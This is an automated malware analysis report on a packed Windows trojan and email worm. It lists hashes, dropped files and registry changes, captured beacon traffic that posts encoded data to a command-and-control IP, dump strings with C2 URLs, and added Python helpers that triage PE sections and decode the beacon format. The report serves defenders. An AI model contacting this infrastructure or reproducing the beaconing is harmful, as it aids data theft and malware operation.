HEUR:VirTool.Win32.Generic (Kaspersky), Gen:Variant.Kazy.366076 (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, EmailWorm, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: b14c438e5457723d7f8cd445b3d69401
SHA1: 48da1d1b3a2281fb59aa745b7466dd1316e55929
SHA256: b6dde1e3f56b5eab25a35c41e395a955f46e2051f2b2994cd755a48c3ea5214e
SSDeep: 49152:I0GEd/4JQfz5prnQ54QozUZnRQtA4NRrfX8DRGc1yUJGRyZU1c/SjrRNmNC44s9e:IVoJftJi4anRQmYrfM4coUBZ5i l
Size: 3862528 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Fusion Install
Created at: 2014-06-04 10:34:07
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):
%original file name%.exe:208
Mutexes
The following mutexes were created/opened:
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
RasPbFile
ShimCacheMutex
File activity
The process %original file name%.exe:208 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\111[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%System%\SkinH_EL.dll (88 bytes)
%System%\esdpf.she (20 bytes)
Registry activity
The process %original file name%.exe:208 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry (most of them, such as the Cache\Paths, Shell Folders, Cryptography\RNG\Seed and SavedLegacySettings entries, are side effects of the process using WinINet and the shell on a fresh Windows XP profile rather than deliberate configuration changes):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA 6B C5 B4 5B 9D 0D 06 A1 75 0A AA DC D8 C2 28"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan sets the Internet Explorer Local intranet zone to include all network (UNC) paths:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
and to include all sites that bypass the proxy server:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Local intranet zone is also set to include all local (intranet) sites not listed in other zones:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
These three ZoneMap values match Internet Explorer's defaults for the Local intranet zone and are normally written the first time WinINet initialises in a fresh profile, so on their own they are weak evidence of deliberate tampering.
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
MD5 | File path |
---|---|
147127382e001f495d1842ee7a9e7912 | c:\WINDOWS\system32\SkinH_EL.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
No processes have been created.
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\111[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%System%\SkinH_EL.dll (88 bytes)
%System%\esdpf.she (20 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 1076750 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 1081344 | 603664 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.data | 1687552 | 401322 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 2088960 | 383528 | 368640 | 1.56795 | 352a9695457ee0ad5ff21f6565a784ad |
.vmp0 | 2473984 | 2517355 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.vmp0 | 4993024 | 49204 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.vmp1 | 5046272 | 3488220 | 3489792 | 5.49416 | bd74e24f97f5e8629357ae467e146b06 |
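A consistency check on the section table, as an added example that is not part of the report: the MD5 d41d8cd98f00b204e9800998ecf8427e shown for every section with raw size 0 is the MD5 of empty input, so those sections carry no bytes on disk and are populated at runtime; .vmp0/.vmp1 are the section names VMProtect uses, which is worth noting because the PEiD signature above names a different packer. The rows are copied from the table; the 4096-byte header size used for the overlay estimate is an assumption (one file-alignment unit, matching the virtual address of .text), and the 7.0 entropy threshold is this example's own.

```python
"""Triage of the PE section table shown above (added example, not the report's own tooling)."""
import hashlib

# Rows copied from the PE Sections table on this page: name | VA | VSize | RawSize | Entropy | MD5
SECTION_TABLE = """\
.text  | 4096    | 1076750 | 0       | 0       | d41d8cd98f00b204e9800998ecf8427e
.rdata | 1081344 | 603664  | 0       | 0       | d41d8cd98f00b204e9800998ecf8427e
.data  | 1687552 | 401322  | 0       | 0       | d41d8cd98f00b204e9800998ecf8427e
.rsrc  | 2088960 | 383528  | 368640  | 1.56795 | 352a9695457ee0ad5ff21f6565a784ad
.vmp0  | 2473984 | 2517355 | 0       | 0       | d41d8cd98f00b204e9800998ecf8427e
.vmp0  | 4993024 | 49204   | 0       | 0       | d41d8cd98f00b204e9800998ecf8427e
.vmp1  | 5046272 | 3488220 | 3489792 | 5.49416 | bd74e24f97f5e8629357ae467e146b06
"""
FILE_SIZE = 3862528                       # "Size" from the report summary
HEADER_SIZE = 4096                        # assumption: headers occupy one file-alignment unit
EMPTY_MD5 = hashlib.md5(b"").hexdigest()  # what a zero-length section hashes to
# Section-name prefixes with a well-known packer owner (case-insensitive match).
PACKER_SECTION_PREFIXES = {".vmp": "VMProtect", "upx": "UPX"}


def parse_sections(table: str) -> list[dict]:
    """Parse the pipe-separated rows into dicts with numeric fields."""
    rows = []
    for line in table.splitlines():
        name, va, vsize, rsize, entropy, md5 = (c.strip() for c in line.split("|"))
        rows.append({"name": name, "va": int(va), "vsize": int(vsize),
                     "rsize": int(rsize), "entropy": float(entropy), "md5": md5.lower()})
    return rows


def overlay_size(sections, file_size=FILE_SIZE, header_size=HEADER_SIZE) -> int:
    """Bytes in the file beyond headers and section raw data; > 0 suggests an appended overlay."""
    return file_size - header_size - sum(s["rsize"] for s in sections)


def triage(sections) -> list[tuple[str, str]]:
    """Return (section, finding) pairs an analyst would want to see before unpacking."""
    findings = []
    seen = set()
    for s in sections:
        if s["rsize"] == 0:
            findings.append((s["name"], "raw size 0: no bytes on disk, contents are produced at runtime"))
            if s["md5"] != EMPTY_MD5:
                findings.append((s["name"], "raw size 0 but MD5 is not the empty-input MD5: table is inconsistent"))
        elif s["entropy"] >= 7.0:
            findings.append((s["name"], f"entropy {s['entropy']:.2f}: likely compressed or encrypted"))
        for prefix, packer in PACKER_SECTION_PREFIXES.items():
            if s["name"].lower().startswith(prefix):
                findings.append((s["name"], f"section name used by {packer}"))
        if s["name"] in seen:
            findings.append((s["name"], "duplicate section name"))
        seen.add(s["name"])
    return findings


if __name__ == "__main__":
    secs = parse_sections(SECTION_TABLE)
    print("empty-input MD5:", EMPTY_MD5)
    print("overlay estimate:", overlay_size(secs), "bytes")
    for name, msg in triage(secs):
        print(f"{name:7s} {msg}")
```

With the report's numbers the raw sizes of .rsrc and .vmp1 plus one 4096-byte header block account for the whole 3862528-byte file, so there is no appended overlay to carve; everything else lives only in the unpacked image, which is why a memory dump of process 208 (the "Strings from Dumps" section) is the useful artefact here.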
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://221.123.147.73/111.asp?post=/33333.mdb2412511990317927241251123456789&2014304352632430223310325223122613267326 | |
hxxp://221.123.147.73/piaoyh.aspx | |
hxxp://221.123.147.73/111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3.. | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3.. HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 221.123.147.73
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK; path=/
Cache-control: private
2....
POST /piaoyh.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://221.123.147.73/piaoyh.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Content-Type: application/x-www-form-urlencoded
accept-languge: zh-CN
Accept-Encoding: gzip, deflate
Host: 221.123.147.73
Content-Length: 12
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK
p=97E121E98E
HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 32
00280096003A009600E1002800EE003A....
POST /piaoyh.aspx HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://221.123.147.73/piaoyh.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Content-Type: application/x-www-form-urlencoded
accept-languge: zh-CN
Accept-Encoding: gzip, deflate
Host: 221.123.147.73
Content-Length: 191
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK
p=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E101E100E&sbm=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E51E51E51E50E58E58E50E49E50E50E
HTTP/1.1 200 OK
Date: Mon, 23 Jun 2014 23:58:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 339
54E60E63E52E56E54E58E50E121E81E109E109E110E102E46E115E107E107E101E95E124E51E51E51E50E58E59E126E50E50E66E66E50E75E63E52E57E64E69E64E52E60E76E50E69E67E64E55E126E94E120E119E100E126E48E51E67E75E58E67E52E52E59E65E68E73E60E52E71E50E71E70E65E58E78E48E125E49E65E66E51E62E73E55E55E59E59E69E65E61E60E68E49E70E66E58E55E50E58E50E50E51E70E55E64E118E56E....
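The two POST bodies above and the server's reply share one encoding: each byte is written as its decimal value followed by the letter E (97E121E98E). The decoder below is an added example, not code from the report or from the malware; reading every number as one byte is its assumption, and the page does not establish what the decoded bytes mean (they are all printable but are not readable plaintext, so a further per-byte transform is likely). The request bodies are copied from the capture; the reply is included only as far as the report shows it before truncating.

```python
"""Decode the 'NNNE' form encoding used in the POSTs to /piaoyh.aspx (added example)."""
import re
from urllib.parse import parse_qsl

# Each byte is its decimal value followed by 'E'; a value is a run of such tokens.
# Assumption drawn from the capture, not a documented format.
NNNE_RE = re.compile(r"(?:\d{1,3}E)+")

# Request bodies copied verbatim from the captured traffic on this page.
REQUEST_1 = "p=97E121E98E"
REQUEST_2 = (
    "p=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E101E100E"
    "&sbm=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E"
    "51E51E51E50E58E58E50E49E50E50E"
)
# Prefix of the 339-byte reply to REQUEST_2, as far as the report shows it.
REPLY_2_PREFIX = (
    "54E60E63E52E56E54E58E50E121E81E109E109E110E102E46E115E107E107E101E95E124E51E51E51E50E"
    "58E59E126E50E50E66E66E50E75E63E52E57E64E69E64E52E60E76E50E69E67E64E55E126E94E120E"
    "119E100E126E48E51E67E75E58E67E52E52E59E65E68E73E60E52E71E50E71E70E65E58E78E48E125E"
    "49E65E66E51E62E73E55E55E59E59E69E65E61E60E68E49E70E66E58E55E50E58E50E50E51E70E55E"
    "64E118E56E"
)


def decode_field(value: str) -> bytes:
    """Turn '97E121E98E' into b'ayb'; reject anything that is not a clean run of tokens."""
    if not NNNE_RE.fullmatch(value):
        raise ValueError(f"not NNNE-encoded: {value[:24]!r}")
    out = bytearray()
    for tok in value[:-1].split("E"):  # drop the final 'E', then split on the separators
        n = int(tok)
        if n > 255:
            raise ValueError(f"token {n} does not fit in a byte")
        out.append(n)
    return bytes(out)


def decode_body(body: str) -> dict[str, bytes]:
    """Decode every field of an application/x-www-form-urlencoded body."""
    return {name: decode_field(value) for name, value in parse_qsl(body, keep_blank_values=True)}


def is_nnne_body(body: str) -> bool:
    """Detection helper: True when a form body has at least one field and all fields are
    NNNE-encoded. Usable as a proxy-log or IDS post-filter for this beaconing."""
    fields = parse_qsl(body, keep_blank_values=True)
    return bool(fields) and all(NNNE_RE.fullmatch(value) for _, value in fields)


def shared_prefix(a: bytes, b: bytes) -> bytes:
    """Longest common prefix: shows which part of p= and sbm= is a fixed identifier."""
    i = 0
    while i < min(len(a), len(b)) and a[i] == b[i]:
        i += 1
    return a[:i]


def printable(data: bytes) -> str:
    """Render decoded bytes, escaping anything outside printable ASCII."""
    return "".join(chr(c) if 32 <= c < 127 else f"\\x{c:02x}" for c in data)


if __name__ == "__main__":
    for body in (REQUEST_1, REQUEST_2):
        print(f"Content-Length {len(body)}")
        for name, raw in decode_body(body).items():
            print(f"  {name}= {printable(raw)}")
    print("reply=", printable(decode_field(REPLY_2_PREFIX)))
```

Two things fall out of running it against the capture: the length of the second body reproduces the Content-Length: 191 header, and p= and sbm= share a 21-byte prefix ending in "|", so the field separator and the per-host identifier can be recognised even though the bytes themselves are still obfuscated.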
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_208:
.text
`.rdata
@.data
.rsrc
@.vmp0
`.vmp0
`.vmp1
g.EM^V7Z
EweB
e%f'G
.OO??b
cS.NO
.fF~p
EV.OrE
X%fqwE
$ÿ'
òDC
.nO? 4
M.Osc
}m.Bb~??
.GFfz
k.bsSw
Wn.QRA
.EEh(
b:\yL
\m.RB
]DU.Nmn
<M>
Vm.BCP
3t5%f
.RQQA
e%F'G
>.NbC_
d%f'Kk
>..QQm
T.pO`x
MM.oO
t$(SSh
~%UVW
u$SShe
kernel32.dll
shlwapi.dll
user32.dll
ntdll.dll
ole32.dll
WinINet.dll
Wininet.dll
CreateWindowStationA
CloseWindowStation
ExitWindowsEx
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
GetAsyncKeyState
GetTcpTable
CreatePipe
MSXML2.XMLHTTP
Microsoft.XMLHTTP
MSXML2.ServerXMLHTTP
MSXML2.ServerXMLHTTP.6.0
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
application/x-www-form-urlencoded
Freestyle.exe
config.ini
1000000001
http://221.123.147.73/zhuzhou.txt
drivers\etc\hosts.asp
&SQL=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
http://
1.ini
2.ini
3.ini
4.ini
.Aqwertyuiopasdfghjklzxcvbnm
c:\11.bmp
C$%cmb
.ppM|
 aZ.mO
%-^
.hk;~
KERNEL32.DLL
COMCTL32.dll
GDI32.dll
MSIMG32.dll
MSVCRT.dll
MSVFW32.dll
USER32.dll
SkinH_EL.dll
%System%\SkinH_EL.dll
%u y2
0.du./
.K.cW
}.Dkn
OkC.xL
%System%\esdpf.she
1990317927
@kernel32.dll
90*('$$-
1-TOUCH PASS
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
SHLWAPI.dll
MPR.dll
VERSION.dll
WSOCK32.dll
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
http://dywt.com.cn
service@dywt.com.cn
 86(0411)88995834
 86(0411)88995831
Windows
(ESPINN.dll(NN
This is a runtime library file for EPL applications. The EPL is a software development environment. For details please visit www.dywt.com.cn/info
CallerInfoCopyCmd
SetIPPort
GetIPPort
"C:\Windows\System32\ESPI11.dll"
ProviderInstallCopyCmd
SockDataCopyCmd
SockAddrCopyCmd
enetintercept_fnSockAddrSetIPPort
enetintercept_fnSockAddrGetIPPort
enetintercept_fnInstallCopyCmd
enetintercept_fnSockDataCopyCmd
enetintercept_fnSockAddrCopyCmd
enetintercept_fnCallerInfoCopyCmd
%s\ESPI%d.dll
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
www.dywt.com.cn
X-X-X-X-X-X
<Msg%s>%ld</Msg%s>
0000%d
<Msg0000></Msg0000>
EMSG
Recv Sub Packet(%s)..
Recv Packet (%s)...
1.1.3
;3 #>6.&
'2, / 0&7!4-)1#
%d%d%d
rundll32.exe shell32.dll,
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
 (&''&(,
*%).--.)%$
#include "l.chs\afxres.rc" // Standard components
>6n.Rr:,
WEBh
D$%%f&G
Vm.BB
|f.oz
n.nn/
5vBN.rR,
5%FWq
],.yx
.fJ&7
.GhX3
H,.sS
-DEYZ}
H<M>
>.Nb!V
;<M%f>
5-%%FjZ
 l%fG
J.fWvVg
_, 792:"
$EE%f
:#Sz%u
n.Rr:$
l%uJ8
%fz[&
7Ww%f
%f:El3
.Rr: EP
.RB%eU
=-.Bb
.OscF6Vj^j
,LM.OP
J*.nB
.OscF&
.N.op
.RJK;
hI%ul
yf.oz
t!:%su
ÿ6w
Kn.BQ
6.Or:
-Aa}=
6.EEh
:$X-0}|
%0xpu
*b.ar3
CD%%F
)>.Oc
 #-mx}
W:\Jn
.Nr:%
.oz(~
N:%xI
Q:%ss
|\:%u;
{m:%f
4X:%dW
%Xym:%X 
v!:%S
:%CX7
.RJBCC$e
cS.gH
%FjZ54
z%f::5\
-.RQP
w%Fj::
6:|s.vr
t5%fz
DU.nE
n.RQQA
.PXjk-z[
SQL F
%fwe%
.FfVw5
M.RB%>
eE%f'
~V.Nrb
.RR:8|p
.FFZE
.Os4:&
D$ B!.Wh
,=>("{[->
~|/f.yx~;
.Rr:>
-.RSw
ôt:>
ymEÿ
N.Rs:>
.pweo
.ol0c
ev.NLL
l-M.Nr3:?z
:?e%fw
..op0
.Osc>V
6.NqE
N%fwE
D$$%u
bX*%u
m.NOs
%.RcDh
 e.fF
!n.RB
%~<M>
.WE}]-G
D<45ò
-i1l}
llzCJ%U
-=N.RB
.fGk O:2
*N.RB
v.OEO<
3.um.
^,0<83:2
[]M.By^
?:3E.WhH
.LCT-
%Fj:3(
m.nNn
.Rr:0
mK.CQe
D$$1%x4
%Fj :0R
.inzE
5%fz;W8
b"Cc$%f&
 n)|.CU
e\.YvRc
#D%%F
.N.nO
rM.nn
w%F:6.
.Pa!EDD4
KV.Xi
m..nOp
~n*%uNg
.EEYYm
.RB%>
 :.Ne
%Fj:6
.FfV12
m.Nrb
}m.Bv
_,6<92:4
$.Oc9
#c$%F
Zn.BQ
n.RS:2
ÿ##G7
E5.ws
&J:.ff~
.NbBV
=N.Rk
?cS6.nOsc
D$ (%9U
cDd%f
.OP0T
D$<7%s4
x%fYj
.Nq2FM
mn.vaV
7.gVg:
d%FG'
.QRvf
.KPay
*%u-,D
.Egio
uU.fe
N.RB6n.
} m.Os
n.yasw/@
-.Rr:
"cd%F&
.Nrjk[
K$..BV
.Ok &
Jn.RB
.Nj*N\
^*.af
H E%8x@i
,\m.RB
*=$H
%FjZ5
D$,%c;2
.Vgff
D$<1%x4
V.-e}5
L|.yh 1q
"3t|.yP
V.Vhm
l-.RB
.oOs4
.Jkiz
?.hizS
%F'gg
D$$%s
.nh7F
öWk
.Ey%FN
.LePa
.Nrb=VwO
)Jm.RB
.ajBS
%XltIl
.mAdx#
!,;2%Dkr
.AXO>]lyOd
%FH7f
2u!63%f
5J@Ü
#d.NHF
&.Vx}
jJ%8x
WINMM.dll
WS2_32.dll
GetWindowsDirectoryA
WINSPOOL.DRV
UnregisterHotKey
RegEnumKeyA
ShellExecuteA
)~.cQ
d3%6x
]Qo@%x
È~qJ
.Rv}#
&/%x0p
J.rhd
*.VP=
LF.LF
CreateDialogIndirectParamA
SetViewportOrgEx
@.vl]
^6a.yUZ
?X.bry
.qL@.^H
.ntPrN
`-21$%DH
 .GK`,/
' .,5?9@'
wgio.kj
(.KI*\
'.nU'6
$^0(4635
-in}I
_^.go
KRQU.Xb
.-(263?@
% -46?>@
7bn.pu
\v\.ad
e !%F
%uLqs~X
%gm.ku
8L.Xh_e
?=E.OV
[%c{H
FJOQ.UV
WeBn
fk-hmpx}
hudp
~"$!-(1<
$p.to
HO.NR
jh.ry
.KYHq
WAw]%XX] 
'"/8-.*, 
?WZ.Xa
%X$)13
%F"@:
$-164138
Y].cf
`l.mw
]`eik.om
e(#&.OJ
#(0352>:
MKS.VQ
".ODA
DKR[f.no
GAC.IM
1;GCE.NIhHK
OEXe
~72K.dH@
68=;V<.GK(NV]^Z
zY.hL
.AqVm
POo>.hJ
.pl/)T
;D.jy!
oi4.YS
Wl.MYH
"=N.CHC
=T%Xz3
E.tO{I
PZfoO.aN
.jueI
O0.Ya
.Nk/}
2.NrO
1.ZT[
QA.tB
.my.(
J[.TO
KR.kQ
.WWQeJ
.DHtS
%UGNV
/(X.bl
.XEU^
%x9}o
H%sia
.miQ,
%d`;L'iCN
q.xCg
B:\8o@
.gr=6Z
WININET.dll
RegDeleteKeyA
ADVAPI32.dll
InternetCrackUrlA
OLEAUT32.dll
SetWindowsHookExA
RegisterHotKey
GetViewportExtEx
RegOpenKeyA
6u!'$%f
RASAPI32.dll
.CxeYi
The procedure entry point %c could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
GetProcessHeap
InternetCanonicalizeUrlA
OffsetViewportOrgEx
WinExec
@0@@@8@ @
=.lh4.
S%XQ([H
DI.UQ
# ,) 126
X".CO
xD.COX
W.hp@
^`.mk
9.AE`DHQW
WG.alq
/'%SzW
%&#/.(51
70>;:@/,
e.oh/u
/I.OO
%.ORs
.mdxp
Y%u(p
b615?GM.PY
Jp$.OLD
b%sMn
"!@'#,19
3S.OG
.KT`_fcd
:v=D.OJ
a.zx(
%Dx*R 
\.xR@
.ns)zx
7ce.nw
0%FIPF
.;.ibi
.OzHo=1
n'.KR
%xRWU]
8?>7D.IW
v16.JX
HVZ.XY
*-0,(53?]
"*/4368.GJf
ib.mT
4M.YH
4Y`en.oi7
.!)`5<8:
.gl#(
bKeY
 01?F@I.OT
(.HSO
$&! 517
{@'(3251?&
Ê1(*
f.EK0
!,. 3(2;8'"
Î@I
ef.kn)q{5
t-.WD
.DC_)@q
$!-.43<)
.XHm_
u_bnw.rz
.)689?;>
' .(6740
Bk.wv
.pyP}
9<D>
Y`.mt
[%/-08=?
!o.XJA|,
[y%.Pas
` ðA
%Fj>j
T^\_[X.dnF
3.ePf
$! '#,0:
!*/)6.5<
MU]fa.gl
ZY.KJ
XZ(.TL
H:.woz`
UWP]aio.np
V8.EC
& #(1159
.6?<.GI8KLJQR
#/0)4265
.GDe(d
~B.Fg
`.joxpsqr
Q.upeK
-Xd},
,4>8EAL.MV
 .HqK
5'".ME
" !-)72?
.ovxnr~
gV`.jp
p5T24V=.DCJM
n/.ON
*.,/521=
j(/)0=.FD@HMITUq5
"j%FP
! -1427<
t%Do}4
;.EMV
.b.OU
BDL.VSIXc
| "/, 536=>:
$".745>6
?9CK.WZ
mlknj.vw
Ygb.nw
.jWZ4
%fjb1
.LS[Z _bed
1!#*5:3<
%xC1i<
.rut_y
}].bn
fK.SW
T^.dm
.tYy}
709@.CO
\^Bo?
$!#,(*07>
v}.xz/
-4xy}
it.QK
]#%FH
gf`ko.jw
\elji.vy
QSWUZfl.it
)61732;<
n.VQ \fnlio)
}%c{H
u.dGLXT
l36>:FI.WPPRUvy
.CNAg
0.sr(
Zb.ls8yz
sT.Zf
gcU%S2'
`.y%x
.ks@}{z
ssh!:
FEKV.ST
) -.03:;0
%xQAT
p).GB
{UPRFi.mk
# ,$.OH
MO.JN7
%xFMn
c%Xx[
X%upD
2801547
.DJ',
!( .zO
_t5\Q.Wc
%x")46
e"%FJ
!O%sn
#'%D-,0
%$0&.)/(
{'#%Dn
#&,835>;@
XX%5Xi0
b%.OU3
JLRU.Ze
".IS$v
`%up'
V\.Yg
B&%XP
ZacVo.puJr
j>E.IV
& %/ 14=
(".cN
$ ' %, 6
'.IOPu
" %(0?@.JI
,.(653;>
JSX]f.geXadko
.qz[d
D,R%c
.GN /6
 .OS9
